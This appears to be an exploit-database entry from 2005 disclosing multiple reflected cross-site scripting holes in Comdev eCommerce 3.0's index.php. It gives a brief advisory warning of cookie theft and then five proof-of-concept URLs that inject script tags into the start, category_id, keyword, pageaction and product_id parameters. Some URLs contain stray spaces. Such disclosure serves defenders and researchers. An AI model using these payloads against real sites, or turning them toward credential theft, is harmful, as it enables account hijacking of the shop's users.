Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities



EKU-ID: 30419 CVE: OSVDB-ID:
Author: SmOk3 Published: 2005-01-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/12382/info

Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.

Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well.

index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=